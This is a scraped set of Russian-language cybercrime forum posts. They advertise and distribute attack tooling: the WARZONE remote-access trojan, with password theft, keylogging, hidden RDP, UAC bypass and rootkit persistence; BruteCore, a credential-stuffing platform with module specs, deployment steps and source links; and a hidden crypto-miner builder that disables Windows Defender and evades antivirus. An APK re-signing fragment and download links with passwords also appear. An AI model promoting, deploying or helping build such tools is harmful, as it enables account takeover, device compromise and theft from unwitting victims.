Все собираем билд apktool b app -o new_app.apk
Подписываем приложение командами
echo y | keytool -genkey -dname "CN=Unknown,O=Unknown,C=Unknown" -keystore mykeystore.keystore -keysize 1024 -alias b5a -validity 14000 -keypass 123456 -storepass 123456 -sigalg SHA1withDSA

jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore
mykeystore.keystore new_app.apk b5a -keypass 123456 -storepass 123456
На этом вроде все!
Кто захочет отблагодарить BTC 1BgTjgmwXZaMYeCmDhhyYXzsbYv9bFcbpi
Если возникнут проблемы спрашивайте.
[Линк](http://wdfiles.ru/5Irl)
Пароль **xerxes**

WARZONE RAT-HRDP

Author: amstrot • 2019-07-12T07:44:30+0000 • Replies: 63 • Views: 17K
Я не являюсь автором данного продукта!!! Всё написанное ниже ни кого ни к чему
не обязывает и не сподвигает на какие либо действия!!!
Данный rat хороший конкурент hvnc и hrdp из тех которые есть на рынке. Главные
его плюсы это работа на всех версиях windows, нет ни каких зависимостей,
лёгкий билд, простой интерфейс, функционален, нет ни чего лишнего и не
понятного, есть свой крипт за отдельную плату, а главное это доступность по
цене. Вы можете всего за 23$ купить месячную лицензию, за 50 на три месяца и
за 490 на пол года. С лицензией на пол года идёт бонусом Rootkit позволяющий
вернуть "клиента" в случаи удаления. Так же у них есть крипт за 100$ в месяц и
за 200 три месяца. Есть хорошая поддержка клиентов с отзывчивым саппортом,
продукт поддерживается и обновляется.

1\. Родная, независимая заглушка. Заглушка этого RAT была написана на C ++,
что делает его независимым от .NET Framework.
2\. Удаленный рабочий стол. Функция удаленного рабочего стола реализована с
помощью специально созданного модуля VNC.
3\. Скрытый удаленный рабочий стол. Модуль HRDP позволяет вам войти на
удаленный компьютер, не зная никого! Учетная запись Windows, созданная этим
модулем, автоматически скрывается от отображения при запуске Windows. Он был
создан с использованием этого замечательного
[GitHub](https://github.com/stascorp/rdpwrap/) .
4\. Повышение привилегий (Обход UAC). Повышение привилегий до Администратора
необходимо для использования модуля HRDP. Это необязательно и выполняется по
запросу из графического интерфейса WARZONE. Эта функция была протестирована и
доказана для работы в операционных системах Windows от Windows 7 до даже самой
последней Windows 10. Это делается с помощью Центра обновления Windows.
5\. Удаленная веб-камера. Если к удаленному компьютеру подключена веб-камера,
вы можете просматривать прямую трансляцию в модуле удаленной веб-камеры.
6\. Восстановление пароля. Захватывает пароли из следующих браузеров:
\- Chrome,
\- Firefox,
\- Internet Explorer,
\- Edge,
\- Outlook,
\- Thunderbird
\- Foxmail
Включить автоматическое восстановление паролей, чтобы получать пароли, не
касаясь каких-либо кнопок!
7\. Файловый менеджер. Загружайте и скачивайте файлы на высокой скорости. Вы
также можете выполнять и удалять файлы. Вы можете скачать и загрузить файлы
любого размера без проблем. Вы также можете выполнять файлы удаленно.
8\. Скачать и выполнить. Получите прямую ссылку для загрузки вашего файла и
запустите ее на удаленном компьютере.
9\. Живой кейлоггер. Вы можете просматривать клавиши, нажатыми на удаленном
компьютере в режиме реального времени.
10\. Удаленная оболочка. Отправить команды в CMD удаленного компьютера.
11\. Менеджер процессов. Просмотр и уничтожение процессов с помощью диспетчера
процессов.
12\. Обратный прокси. Просматривайте Интернет с IP-адресом удаленного
компьютера!
13\. Автономный кейлоггер. Keylogs сохраняют все действия клавиатуры Вашего
"клиента"!

[WARZONE RAT](https://warzone.io/customer/aff.php?aff=67&page=hackforums)

[Скришот](https://i.imgur.com/VKvLE9Z.gif)
[YouTube канал](https://www.youtube.com/channel/UCnJvHfkjlwL4YERWkuuykSw)
Отзывы

P.S. WARZONE RAT считаю одним из лучших из тех которые есть на рынке, но это
моё сугубо-личное мнение.

BruteCore - Универсальный брут/чекер

Author: 0xUser • 2024-02-04T10:31:19+0000 • Replies: 81 • Views: 16K
![1707040190035.png](https://xss.is/attachments/76066/)​

_**Введение** _
Когда я только увидел что обьявлен новый конкурс на ХСС, сразу решил что буду
участвовать. Однако возник вопрос, с каким проектом лучше всего зайти в
конкурс. Я долго выбирал между тем, чтобы написать мессенджер на замену Токса
с обнаруженной RCE, или же написать брут, которых я написал целую кучу и
тележку на Delphi. Но понял, что начни делать я месседжер то я точно не успею,
да и опыт написания брутов/чекеров у меня весьма обширный. Я писал их на любой
вкус и цвет, разбирал мобильные приложения, разбирался в шифрования на
различных сайтах. С учетом всех этих аспектов я понял, что я буду делать. Но
вопрос был в другом, брут должен быть по настоящему уникальным, а не просто
еще одним брутом под один сайт с загрузкой базы и проксей.

**Преимущества:**
_1\. Все в одном месте_
Когда часто занимаешься написанием брутов, у тебя скапливается целая куча
всего — скомпилированные бруты с результатами, исходники. Это всё разбросано
по разным папкам и как-то неудобно. А если добавить к этому еще какую-то фичу,
приходится заходить в каждый софт, дописывать и компилировать, что забирает
уйму времени.
_2\. Современный стек_
Обычно бруты пишут на Delphi или C#, но эти языки уже немного устарели для
этой задачи. Либо же бруты пишут с использованием OpenBullet или Private
Keeper, и таких была еще целая куча, но остальные как-то не сильно прижились.
Я выбрал Golang за его выдающуюся производительность при высоких нагрузках и
эффективную работу в многопоточке. Это может быть не тот же ООП-язык, но для
поставленных целей он отлично подходит.
_3\. Кросс-платформенность_
Большинство брутов создаются под Windows для удобства конечного пользователя.
Но использование Golang позволяет компилировать его под различные операционные
системы без проблем. Так что помимо Windows, мы можем легко работать на
серверах под Linux, что добавляет гибкости и многофункциональности.
_4\. Web-морда вместо GUI_
Те, кто брутит, обычно используют выделенные серверы с Windows, управляя ими
через RDP. Это дорого и не всегда удобно. Работать с брутом как с веб-сайтом
гораздо удобнее. Открываешь вкладку в браузере и работаешь там.
_5\. Сохранение всех настроек в пресеты_
Для того чтобы не вводить настройки каждый раз заново, я реализовал пресеты.
Указал источник прокси, их тип, и потом просто выбираешь этот пресет. Также
сохраняется остаток, результаты можно скачать в txt или xlsx формате. Также
если брут был остановлен по какой-либо причине его можно запустить повторно и
не нужно брать остаток запихивать его по новому и прописывать все настройки
снова, что как по мне тоже очень удобно.
_6\. Никаких ограничений ядра для разработчиков_
В универсальных брутах накладываются определенные ограничения на разработчиков
проектов. У меня модуль — это микросервис с одним эндпоинтом, и его можно
написать на любом компилируемом языке. Входные данные в него, он выполняет
свою магию и говорит гуд, бед, ошибка и так далее. Никаких ограничений ядра
для разработчиков.

_**Инструкция по использованию**_
Алгоритм использования программы примерно следующий:

1. Загружаете базку
2. Создаете новый прокси пресет
3. Подгружаете модуль
4. Создаете сессию, выбираете то, что создали выше и после чего стартуете.

Теперь давайте пробежимся по каждому пункту подробнее

**Комбо листы****
![1707040541328.png](https://xss.is/attachments/76069/)**
Для удобства хранения баз данных я добавил возможность создавать папки и
группировать базы внутри них. Учитывая, что баз данных может быть много и по
разным темам, это сделает навигацию проще. Просто кликните правой кнопкой мыши
в свободном месте и выберите "Создать папку" или "Создать комбо-лист".

Чтобы создать папку, достаточно ввести название папки в появившемся модальном
окне после нажатия правой кнопки мыши.

Комбо-лист работает немного по-другому. Он позволяет объединить несколько
файлов или ссылок, чтобы сформировать один общий список. Например, вы можете
указать файл на сервере и ссылку на Sendspace, где также хранится база данных,
и получить один комбо-лист с данными из нескольких источников. Вы также можете
указать одну ссылку или файл, в зависимости от вашего удобства. При создании
комбо-листа нужно указать тип данных, которые будут включены в него.
![1707040590170.png](https://xss.is/attachments/76070/)
Пока что, в настоящее время можно только указывать прямые ссылки на файлы, что
действительно удобно, если ваши базы данных хранятся в облаке. Второй вариант
загрузки баз из файла, который находится на той же машине, где запущен софт.
Пока не сделал возможность выбирать файл с той тачки, где сидит пользователь.
Я решил не включать эту функцию пока что, потому что знаю, что некоторые
пользователи загружают огромные базы с несколькими миллионами строк и
оставляют это на ночь. Загрузить такие большие базы данных сюда было бы
довольно сложно, поэтому я решил отложить эту функцию на потом. Однако, если
вы запускаете софт на той же машине, где и находитесь вы, то указание пути к
файлу не представляет проблем.
![CombolistDirectLink.png](https://xss.is/attachments/76071/)
Если хотите удалить папку, то сначало надо удалить вложенные в нее элементы.
Если хотите удалить комбо лист, то не должно быть никаких связанных с ним
сессий. Если на ФО есть клауд, софт его не обойдет, по этому смотрите чтоб
клаудфлара не было на ресурсе куда залита базка.

**Прокси пресеты**
![Снимок экрана 2024-02-04 160122.png](https://xss.is/attachments/76072/)
Тут это выглядит примерно следующим образом, собственно имеет определенную
схожесть с комбо-листами, только здесь я не стал делать папки. Как правило
прокси грузят либо из файла, каждый раз разные, либо по АПИ ссылке всяких
сервисов таких как адвансы, бесты или авм, вообщем по вкусу и цвету... и там
уже они в режиме реального времени обновляются с какой-либо переодичностью.
Бывали и такие случаи когда прокси записывают в файлик на диске и уже из него
обновляют с определенной переодичностью в бруте. В этом плане использовать
пресеты удобно использовать. На случай если это разовая загрузка из файла, в
котором прокси быстро сдохнут, то можно не создавать пресет, а сразу грузить
прокси в сессии, для этого есть отдельная кнопка в сессиях, выбираете ее и
грузите там уже свой файл с диска.

Но все же давайте вернемся к пресетам.
![ProxyPreset.png](https://xss.is/attachments/76073/)
При использовании пресета для загрузки прокси по ссылке или из файла на диске,
вы указываете наименование пресета. Если прокси будут обновляться с
определенной периодичностью, вы ставите галочку напротив интервала и
указываете время в секундах.
Таймаут соединения с сайтом для прокси подразумевается как обычно, это время
ожидания ответа от сервера при подключении к нему.
Как и в случае с комбо-листами, вы можете указать несколько источников, из
которых будут браться прокси. Если файл находится на вашей тачке, то
автообновление прокси для него не будет работать, и программа будет всегда
брать данные из загруженного вами файла. Это вполне логично.
Для удаленных файлов и ссылок автообновление будет активно. Вы можете выбрать
несколько типов прокси: HTTP/S, SOCKS4, SOCKS5. Это означает, что в одной
сессии брута могут использоваться сразу несколько разных типов прокси. Это
удобно, так как вы можете указать несколько ссылок с разными типами прокси, и
программа будет использовать их все вместе.

**Модули
![1707041123799.png](https://xss.is/attachments/76074/)**

Собственно сама вкладка очень простая, жмякаете добавить, загружаете файлик
модуля и он подтягивает его в эту вкладку. А вот как делать сами модули, это
уже отдельная история.
Модуль представляет собой независимый микросервис со своей собственной
спецификацией написания. Хотя модуль можно писать на любом языке
программирования, я бы все-таки рекомендовал использовать Go, поскольку он
компилируется в единый исполняемый файл и легко запускается на любой
платформе. Однако следует помнить, что если ваш BruteCore запущен на Linux, то
модуль также должен быть скомпилирован под Linux, и аналогично для Windows.
Когда вы загружаете модуль, он запускается с параметром "-getinfo", и модуль
должен вернуть JSON следующего формата:

JSON:Copy to clipboard



{
"name": "TestModule",
"version": "1.0.0.0",
"author": "0xUser",
"data_type": 9
}


Поле "data_type" определяет тип данных комбо-листа, с которым работает модуль.
Вот возможные значения:

Code:Copy to clipboard



4 DATA_TYPE EMAIL
5 DATA_TYPE USERNAME
6 DATA_TYPE PASSWORD
7 DATA_TYPE PIN
8 DATA_TYPE USERNAME:PASSWORD
9 DATA_TYPE EMAIL:PASSWORD
10 DATA_TYPE DATA


Все вышеперечисленные типы вы можете найти в таблице reference в БД которая
лежит рядом с проектом. Если какого-либо поля из выше приведенного формата
json нету в модуле, BruteCore установит значение none, как выше на картинке в
поле “Версия”. Сами модули сохраняются в папке modules рядом с софтом.
Если какого-либо поля из вышеприведенного JSON отсутствует в модуле, BruteCore
установит его значение в "none".
Модули сохраняются в папке "modules" рядом с программой.
При запуске модуля для перебора, он вызывается с аргументом "-port",
указывающим порт, на котором должен быть запущен микросервис.
Модуль должен иметь эндпоинт POST "/ExecuteModule", который принимает JSON
следующего формата:

JSON:Copy to clipboard



{
"email": "0xUser@0xuser.cf",
"username": "0xUser",
"password": "xss.password",
"pin": "1234",
"data": "example_data",
"timeout": 15000,
"proxy_host": "127.0.0.1",
"proxy_port": 8080,
"proxy_type": 18
}


Практически все поля являются опциональными. Практически все поля являются
опциональными, некоторые из них могут отсутствовать, например если брут идет
без прокси то соответствующих полей в json не будет, если был выбран 9 тип
комбо-листа то будут присутствовать поля email и password и уже соответственно
по разным типам комбо-листа. Сервис проводит определенные действия с данными и
возвращает JSON следующего вида:

JSON:Copy to clipboard



{
"status": 25,
"log": "proxy: 127.0.0.1:8080 \n some additional data in log"
}


Поле log является опциональным и впринципе может отсутствовать если оно вам не
нужно. Статус может иметь следующие значения:


Code:Copy to clipboard



25 RESULT Хорошие
26 RESULT Плохие
27 RESULT Ошибки Соединения
28 RESULT Ошибки ПО
29 RESULT Капча
30 RESULT С балансом
31 RESULT Пустышки
32 RESULT Зарегестрирован
33 RESULT Залимиченные


По идее всю основную работу делают модули, сам же БрутКор выступает в роли
некоего оркестратора, который запускает нужный сервис, поддерживает его в
рабочем состоянии, отправляет на него входные данные, дальше происходит
модульная магия, “особые физико-математические вычисления” в результате
которых мы и узнаем гуд, бэд это или еще что-то.
ВАЖНО!! Поскольку мы работает уже с скомпилированными модулями, там могут быть
всякие “закладки”, ведь тут для разработчика нет абсолютно никаких ограничений
в плане того какой код писать какие библиотеки использовать и т.д., поэтому
стоит быть очень аккуратным и использовать модуль только от доверенных людей,
либо писать модули самому. Береженного бог бережет!
Ниже в статье вы можете найти пример готового модуля и использовать его как
шаблон для написания своих модулей.

**Сессии**
**![1707041569245.png](https://xss.is/attachments/76076/)**
В сессиях все относительно просто, создаете новую сессию кнопочкой добавить
потом нажимаете на стрелочку справа и переходите к деталям конкретной сессии.
![1707041605852.png](https://xss.is/attachments/76077/)
Выбираете комбо-лист который хотите брутить, после чего вы можете выбрать
прокси либо из готового пресете, либо уже загрузить из файла, который есть на
тачке с которой вы подключаетесь, если хотите брутить без прокси то ничего не
выбираете и брут будет идти без прокси. Выбираете модуль, проставляете нужное
вам количество потоков и запускаете.

Менять прокси лист, комбо лист или модуль во время перебора вообще не
желательно. Но вы можете поменять количество потоков прям во время работы,
софт автоматически подхватит количество потоков и при необходимости избавится
от лишних, либо создаст новые неостающие. Что бы получить статистику по бруту
нужно нажимать на кнопку обновить справа от слова статистика, да возможно это
не удобно, может следовало сделать что бы он по вебсокетам обновлял
статистику, ну хз, не захотел делать дополнительную нагрузку на софт.
Результаты соответственно можно посмотреть нажав на кнопку результаты,
откроется следующая вьюшка.
![1707041652036.png](https://xss.is/attachments/76078/)
Собственно здесь обычная пагинация по результатам, выбираете что хотите
посмотреть, сколько должно отображаться записей разом и уже смотрите.

Результат можно скачать в друх форматах, либо txt, либо xlsx, думаю кто
работал с экселем обязательно заценит. Если по гудам были какие-то логи то они
будут в правой колонки с логом. Тут уже зависит от проекта который вы
запускаете.
_**
Инструкция по использованию**_

Устанавливаем Node.js с официальнго сайта <https://nodejs.org/en/download>.
Устанавливаем Vue-cli командой npm install -g @vue/cli.
Устанавливаем Golang с официального сайта <https://go.dev/doc/install>.
Качаем исходник фронтенда и бэкенда.
В папке с фронтом запускаем npm i в папке с бэком go mod tidy и go mod vendor.
Если планируете запускать BruteCore у себя на тачке локально, то нужно сделать
следующее:

1. В папке с фронтом запускаете команду npm run serve
2. В папке с бэком запускаете команду go run .
3. Переходите в браузере по localhost:8080
4. Готово

Если будете запускать BruteCore на сервере, то нужно сделать следующее:

1. В папке с фронтом, в файле src\main.js, на 12 строке меняете <http://127.0.0.1:985> на свой домен или адрес сервера (например: <http://0xuser.cf>, <http://255.255.255.255>)
2. В папке с фронтом запускаете npm run build, вьюшка соберет все исходники и создастся папка dist, в которой будут лежать все необходимое для фронта.
3. В папке с исходник бекенда, в файле “.env” меняем значения AUTH_ADMIN_LOGIN, AUTH_ADMIN_PASSWORD, AUTH_VIEWER_LOGIN, AUTH_VIEWER_PASSWORD, JWT_KEY на свои, также нам нужно поменять значение JWT_KEY на любую строку, это ключ которым будут шифроваться jwt токены на сервере.
4. В папке с бэком устанавливаем переменные окружения “set goos=linux, set goarch=amd64”, если на вашем серваке какая-то другая архитектура, то указываете свою архитектуру.
5. Собираем бэк командой “go build main.go”

По итогу мы имеем папку dist с фронтом и исполняемый файл для linux с
бэкендом. Теперь мы заходим на наш сервак и обновляем имеющиеся на нем пакеты
до последней версии командами:
`sudo apt update`
`sudo apt upgrade`
Накатываем nginx командой:
`sudo apt nginx`
Копируем содержимое папки dist в папку /var/www/front.brutecore
Копируем скомпилированный main, .env, BruteCore.sqlite в папку
/var/www/back.bruteforce
После запускаем команду `chmod +x main`
В папке /etc/nginx/sites-available создаем файл brutecore со следующим
содержимым, где server_name localhost, “localhost” меняем на свой домен или
адрес сервера:

NGINX:Copy to clipboard



server {
listen 80;
server_name localhost;
charset utf-8;
root /var/www/front.brutecore;
index index.html;

#Always serve index.html for any request
location /Health {
proxy_pass http://127.0.0.1:985/Health;
}

location /api {
proxy_pass http://127.0.0.1:985/api;
}

location / {
root /var/www/front.brutecore;
try_files $uri /index.html;
}

error_log /var/log/nginx/vue-app-error.log;
access_log /var/log/nginx/vue-app-access.log;
}

Дальше выполняем команду:
`sudo ln -s /etc/nginx/sites-available/brutecore /etc/nginx/sites-enabled/`
Также редактируем файл /etc/nginx/nginx.conf
Находим вот эти строки и раскоменчиваем их
![Снимок экрана 2024-02-04 162041.png](https://xss.is/attachments/76079/)
Также нам надо рядом добавить строку: `client_max_body_size 20M;`
Это нужно что бы nginx сжимал стили и прочие скрипты, а также что бы мы могли
без проблем загружать модули на сервер.

Перезапускаем nginx командой: `sudo systemctl restart nginx`
После чего запускаем бэкенд комагдой `sudo nohup ./main &`, и переходим в
браузере по адресу нашего сервера или домена. Если все сделали правильно, то
должно появиться окно входа и мы без проблем в нем авторизовываемся.
Если после входа в Учетку будете получать ошибку “failed to initialize
database, got error Binary was compiled with 'CGO_ENABLED=0', go-sqlite3
requires cgo to work. This is a stub” то тогда нужно установить гошку на
сервак, потом установить туда же gcc/g++ компилятор командой `sudo apt-get
install build-essential` и после чего уже билдить приложение на серваке и оно
будет работать.

Все исходники можно скачать по ссылке <https://www.sendspace.com/file/2ujpbd>
Специально развернул демку что бы можно было посмотреть как оно выглядит уже
задеплоенное <http://45.83.122.198/> Логин XSSViewer, Пароль: xss.is1pass

FakeIT 5.0

Author: hits • 2019-01-17T11:50:44+0000 • Replies: 42 • Views: 16K
Скрипт для создания фэйков, закодированный:

[удалено, по просьбе автора]

CH Miner 4.0 Builder + Panel, Last stable version

Author: Ingiborga • 2021-04-06T19:17:11+0000 • Replies: 130 • Views: 15K
**CH Miner - Скрытая система майнинга и контроля для любых консольных
майнеров.**

**![Workers.PNG](https://xss.is/attachments/21546/)

![Снимок.PNG](https://xss.is/attachments/21547/)**​


**


Сканы:**

### [ 1 file ](https://avcheck.net/id/zpG4pQECfn1T)

![avcheck.net](/proxy.php?image=https%3A%2F%2Favcheck.net%2Fimg%2Flogo-
blue.png&hash=cee6508989b328cffbfe9596440db6c7&return_error=1) avcheck.net

### [ Report #1c50fbfe53da025471740bb054f851df | Dyncheck.com ](https://dyncheck.com/scan/id/1c50fbfe53da025471740bb054f851df)

![dyncheck.com](/proxy.php?image=https%3A%2F%2Fdyncheck.com%2Fscan%2Fid%2F1c50fbfe53da025471740bb054f851df%2F&hash=9da0df3afde230f2365c52dcf14b68b1&return_error=1)
dyncheck.com



**Функционал:**

* Скрытый запуск любых майнеров с консольными параметрами.​

* Определение CPU/GPU - Кол-во памяти видео карты и подбор нужного майнера в зависимости от памяти GPU​

* Майнеры отправляются в сжатом zip архиве с паролем что позволяет уменьшить рантайм детект и сжать очень тяжелые майнеры(например более 650мб что бы не слили на ВТ после крипта)​

* В комплекте 3 почищенных майнера под RavenCoin, Monero, Ethereum.​

* Авто-старт майнеров при появлении новых ботов​


**Доп. Функции:**

* File Loader​

* Remote Desktop​

* File Manager​

* Process Manager​

* Remote Shell​

* Execute .NET Code​

* Get Admin Privileges​

* Disable Windows Defender​

* Visit WebSite​

* Send MessageBox​

* Client: Close, Restart, update, uinstall​

* PC: LogOff, Restart, Shutdown​

* Block Bot​


**Защита:**

* **Aggressive \- не дает запускаться популярным диспетчерам задач.**​

* **Easy \- При обнаружении популярных диспетчеров задач завершает процессы майнинга и себя(ждет 4 минуты и снова запускается убивая 1 раз все диспетчеры задач)**​



* * *


Тестить на ВМ! Но вроде чист, на лева не стучал не билд не панель.

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich-
file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)

### [ File on MEGA ](https://mega.nz/file/xSxgACrK#8hoiGl-
RrYnAl2L8M0-9eEDaSl_kKiu7JV9YFgVkMmo)

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Ffavicon.ico%3Fv%3D3&hash=e53d624adca7627506d5d1102d696d4e&return_error=1)
mega.nz



Spoiler: Скрины доп.

![CPU.PNG](https://xss.is/attachments/21548/)
![GPU.PNG](https://xss.is/attachments/21549/)
![Settings.PNG](https://xss.is/attachments/21550/)